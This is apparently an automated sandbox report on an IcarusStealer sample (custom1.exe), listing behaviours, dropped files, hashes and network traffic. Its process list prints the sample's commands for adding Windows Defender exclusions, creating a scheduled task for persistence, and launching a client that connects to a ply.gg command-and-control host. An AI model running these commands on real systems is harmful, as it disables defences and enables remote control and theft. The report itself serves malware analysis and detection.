Analysis Overview
SHA256
13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
Threat Level: Known bad
The file custom1.exe was found to be: Known bad.
Malicious Activity Summary
IcarusStealer
Modifies Installed Components in the registry
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Modifies system certificate store
Delays execution with timeout.exe
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-03-09 09:41
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-09 09:41
Reported
2024-03-09 09:42
Platform
win7-20240221-en
Max time kernel
85s
Max time network
80s
Command Line
Signatures
IcarusStealer
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\custom1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\custom1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File created | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2836 set thread context of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\custom1.exe
"C:\Users\Admin\AppData\Local\Temp\custom1.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jtzagf3c\jtzagf3c.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39B6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7C576929BC544C378385B5D37F5CDC1.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe & exit
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4A97.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.1.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 104.26.1.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49222 | tcp | |
| N/A | 127.0.0.1:49224 | tcp | |
| US | 8.8.8.8:53 | operating-noble.gl.at.ply.gg | udp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:49289 | tcp | |
| N/A | 127.0.0.1:49291 | tcp |
Files
\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 24d1fc20d9be37ebdb2e28f5a9ea5231 |
| SHA1 | e9fb985958daa541aa2a85d04f1d431ddabea2cd |
| SHA256 | 89ba02cd96b0cb075918c87d9a062d5a66e2a061c0408786de0fa5c9d0147efa |
| SHA512 | 617a6305f65a1979d963ae5f0445bec6783fb572a4287c88e4e5ff4e32f48134220253ffb7fb71cf67b2269f14e0785a70e418d31ce4670ba5aff92f3f73fc1f |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 27e4a8dd5bafdf2db044b899d5054854 |
| SHA1 | 5cd13eb3fd787b20b8d2fa76db824a9f8f1576ed |
| SHA256 | c38dbd63bcaf7b6792b34b764ba41d96684050926166ab7e07c5f73551eb349f |
| SHA512 | 6d183fb1061537c2d3d81a2fba602457dbc3c35d29c335e97b201cfc819b2144bbf538a20d54f0d6e1666335617aeb888997c25f7a24d07c02bcbd61f1ba0f08 |
\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | b9bbe31d276de5c3d05352d070ae4244 |
| SHA1 | 5e1bb67b01c579b4e0ad5a7475ceb657201c27ec |
| SHA256 | a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d |
| SHA512 | 0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17 |
memory/2104-14-0x0000000000820000-0x0000000000E60000-memory.dmp
memory/2104-15-0x0000000074770000-0x0000000074E5E000-memory.dmp
\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | b1d3b6f7673bd8572d9519468a6a2d6c |
| SHA1 | 61b907e4abdf29b77c5da751150f4172163f0a04 |
| SHA256 | e78cbf2e8d31f6140a7e7afdadd6d96a6c5475fd9149c7b920edfb8b889b42a9 |
| SHA512 | 9d1de488e44e347c7816b7a568401564f1e80c0aadf679d6bac22413c9e4d0efedce0e565a27cc80e95858abdbd84923c062144783cb3dd9bb1a11dd2ac2e959 |
memory/1816-21-0x00000000031D0000-0x000000000360C000-memory.dmp
memory/2664-23-0x000000013FDB0000-0x00000001401EC000-memory.dmp
\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA1 | 932bd4d1c11996bf8ac3ac74a94b266e96d44c36 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
| SHA512 | a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | d6b7c22d63d968bbdcc8aef039e05763 |
| SHA1 | 3416f97b85334c4de6f4893472997715b28a08fa |
| SHA256 | 68e9e1b5290f496213817ba012fdc08e53194de56207a757d4569b5eda53710b |
| SHA512 | eb0262a55973e9ea4fbc6eda3bca320db34b68000e79ea2f96971d158b5e93957cb355b7a745deb83a5b8f9ee0a9fa84e4246a39a61be055930c6f7af89c39e7 |
memory/2836-31-0x0000000074770000-0x0000000074E5E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 0731c4cb06802ce1c8654cf575c0a275 |
| SHA1 | 623d24a9a8a10e32202a3f157223966b15379bbe |
| SHA256 | fba7e5480fa13c4df3654a5c66509b6b51a1029bf95dd92e8b7de6f708b68866 |
| SHA512 | ccd5b8e2b985f07871575344b4a9cad49eda283043b690579477f6af0da3c37bec1cbb3ba13e45e5e40832a72c529354d9be73ee69341c28218479fb4d65086a |
memory/2836-29-0x0000000000ED0000-0x0000000000F52000-memory.dmp
memory/2836-32-0x0000000004BC0000-0x0000000004C00000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\jtzagf3c\jtzagf3c.cmdline
| MD5 | 5abeab481585f52d3798cf9c34a6b4ad |
| SHA1 | b6994dda0841c535adb5f6cba0ac4f96c8df1159 |
| SHA256 | 4f2c19d03c38329ce4978ae9617f19bccd84ecbe66035caed42ea85bd99f107a |
| SHA512 | cea6fd4b944b4fb5a196e15242e8e9e488853e1132e0815b909b77be388ecff313e1aa563cc69a286e337390c4e93b4955f047fbb2025ea7457410c3c4213e82 |
\??\c:\Users\Admin\AppData\Local\Temp\jtzagf3c\jtzagf3c.0.cs
| MD5 | 14846c9faaef9299a1bf17730f20e4e6 |
| SHA1 | 8083da995cfaa0e8e469780e32fcff1747850eb6 |
| SHA256 | 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b |
| SHA512 | 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1 |
C:\Users\Admin\AppData\Local\Temp\RES39B6.tmp
| MD5 | e3f5eff15a6d019f24199eb59a5f4507 |
| SHA1 | 50520905e2ee6942877325bd094501000131de62 |
| SHA256 | d530dec1cd765b2f9b93e1e97381dd1104d374e247c766d30a14f7fc2790ed5c |
| SHA512 | 0b530d15e622349cf99bdd2ba6ce802dcd460d6a83a61c75d54d9314e2482c54800a489bd6c43d0e39acd25849f6cf43c4f915d0d9103dc39adaf5854f01a7aa |
\??\c:\Users\Admin\AppData\Local\Temp\CSC7C576929BC544C378385B5D37F5CDC1.TMP
| MD5 | 8cb2d1f69e2730b5de634f6b6c12005f |
| SHA1 | 1f9496195f09f58a4e382994717a5da34086d770 |
| SHA256 | f5d616663ac61dc843c8663f2ceaaf6939b974ffd74e6e1be232b3fe8c6667ea |
| SHA512 | d035c16a8d8f09abedc94e10d46983e371d2862b277128fe00184d3a1cbb8a69367c08e150c63b07729938bea6644af4e3913e629969d38978b0d934e9e61eda |
memory/2104-40-0x00000000007D0000-0x0000000000810000-memory.dmp
memory/1940-46-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1940-48-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1940-50-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1940-52-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1940-54-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/1940-55-0x0000000000400000-0x0000000000424000-memory.dmp
\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
| MD5 | b8463bfe87a308d78eeadf45d4157cfe |
| SHA1 | f677f3039a2ae1e57248a0c6a8aff369550b30b7 |
| SHA256 | b5dca84981080cf9f13e6939319a25c7406dfc08e65ad194f1d834354d6dd756 |
| SHA512 | 58a7eb083ca10e407d79f525d111a64d34c2a7d0886f34842a2d068953d5bdcf26dfc59113811c5cacdb3beebf91895f94dd9f493b0b0c763cc3570f0f2a6047 |
memory/1940-57-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1940-63-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2812-64-0x0000000001090000-0x0000000001098000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\475A77L9LKKHTQDDIXKD.temp
| MD5 | 45a0e40f56e720fb1a92b00c360d9af8 |
| SHA1 | 513898d95070ba5f0c9ca5ea791c74bb9d1c9b41 |
| SHA256 | 0bcd9543b00146e7a339228f4e2a256c855d62b27cfe354e16ca733db2c11999 |
| SHA512 | 9b97cbc3604358eb0de6acf58118e221cc678dac399660b3c4c3cc42e9f9e4d3b8611f41727d4ecca70276667a71a2a1b3446c794ac46ea31f560735b58ba5a5 |
memory/2812-72-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp
memory/2836-74-0x0000000074770000-0x0000000074E5E000-memory.dmp
memory/1940-73-0x0000000004A90000-0x0000000004AD0000-memory.dmp
memory/2968-76-0x000000006EE80000-0x000000006F42B000-memory.dmp
memory/2968-79-0x0000000002E10000-0x0000000002E50000-memory.dmp
memory/2296-80-0x000000006EE80000-0x000000006F42B000-memory.dmp
memory/2968-81-0x000000006EE80000-0x000000006F42B000-memory.dmp
memory/1940-83-0x0000000074770000-0x0000000074E5E000-memory.dmp
memory/2968-82-0x0000000002E10000-0x0000000002E50000-memory.dmp
memory/2296-78-0x00000000029C0000-0x0000000002A00000-memory.dmp
memory/2296-77-0x000000006EE80000-0x000000006F42B000-memory.dmp
memory/2812-86-0x000000001AEC0000-0x000000001AF40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp4A97.tmp.bat
| MD5 | fdf39570350a562f37c37e9cf86bcb6d |
| SHA1 | 0b0e338a1dbb0cfd57bb82af04828f794febf674 |
| SHA256 | f3f9eb2d784108644bfd1cee7919549bde0970dfecd099b27d58023ee3e07138 |
| SHA512 | 381e14f26affbe0fe865b8baf4a49224905f85c04f17778c0403881d12f978685757a7943b6495b6f2d5ebdd8d193b2694f12f94857f0d0e8ec86a38a32da2c7 |
C:\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | 4ac2ac348d86c9c79edda4ff78db7ca6 |
| SHA1 | ccfc7829fbe550943442800be506a02979d07947 |
| SHA256 | 16296efa547c3f120a27b0eafedd56848023cf626f27e873e47a1481ab2feb37 |
| SHA512 | b9b79bd4cdb3278db74607a6ce955e6320bb9908c3c1ace9b005afbd06dfc3246f8f4f3715ee8f8c6408e3e82481c4a97c09f15afa453e5fc2ec82cabc02c1ee |
memory/2104-96-0x0000000074770000-0x0000000074E5E000-memory.dmp
memory/2968-98-0x000000006EE80000-0x000000006F42B000-memory.dmp
memory/2296-99-0x000000006EE80000-0x000000006F42B000-memory.dmp
memory/2664-100-0x000000013FDB0000-0x00000001401EC000-memory.dmp
memory/1800-101-0x0000000004290000-0x0000000004291000-memory.dmp
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
| MD5 | b7450fbac82b11bd97f2cac20d41f9e4 |
| SHA1 | e586a7078b4be22b6783b8171ebd810ea031c1ba |
| SHA256 | 02192e27d1c215621294f307f3e349e9d6247b347f74ba22357f2840c1e171f3 |
| SHA512 | 3a9e1844cf55b4fe6b81ab50df5ba5e41225ffa1847d096c514a08a7fdf3fbda8374207368326e2642ed1e98db240a0592d2cd382cc97e365a880a4734bcb005 |
\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | a9696c84d1bc8731fda72d5073f0cfe3 |
| SHA1 | c364c3a16ee68efb9b9a91e6ed51cd0bdf9af45a |
| SHA256 | dd576bb7be7807a85506c5687a7a34726abbb16e5324dc614210ec3abb1ff14b |
| SHA512 | 956709deead60d1517f23de733822c359b646155f7d32e0750414c0e6160096793c1020b9d1fb6b7775208cd0b112ccb03128a5d1c4c4b354bbd7860063c0ddf |
memory/916-106-0x0000000074770000-0x0000000074E5E000-memory.dmp
memory/916-105-0x0000000000CA0000-0x00000000012E0000-memory.dmp
C:\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | d71d46ceaa10ef71d9d274dbdb1d5ec1 |
| SHA1 | 44cd39fc1def63ab7183a2e4cb1a2ea4667ffad8 |
| SHA256 | c0d54d7f6a7474f005f61f27c6d59dd0f7b731ca51c746f0643119c596e86516 |
| SHA512 | 877e2b629434b354795e6eb08eb5c281950e8e20341ad3d18d58985504a5b642f3405266c0118d10875c4fb6ea18e77d8da8dd2c2ed7875e47dbcf25bb8a621e |
memory/916-107-0x00000000048E0000-0x0000000004920000-memory.dmp
C:\Windows\System32\CatRoot\$SXR\Read.txt
| MD5 | 79668a6729f0f219835c62c9e43b7927 |
| SHA1 | 0cbbc7cc8dbd27923b18285960640f3dad96d146 |
| SHA256 | 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e |
| SHA512 | bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3 |
C:\Users\Admin\AppData\Local\Temp\Cab6CD9.tmp
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
memory/2812-126-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp
memory/1940-127-0x0000000004A90000-0x0000000004AD0000-memory.dmp
memory/1940-128-0x0000000074770000-0x0000000074E5E000-memory.dmp
memory/2812-129-0x000000001AEC0000-0x000000001AF40000-memory.dmp
memory/1800-130-0x0000000004290000-0x0000000004291000-memory.dmp
memory/916-131-0x0000000074770000-0x0000000074E5E000-memory.dmp
memory/916-132-0x00000000048E0000-0x0000000004920000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-09 09:41
Reported
2024-03-09 09:42
Platform
win10v2004-20240226-en
Max time kernel
16s
Max time network
64s
Command Line
Signatures
IcarusStealer
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Checks computer location settings
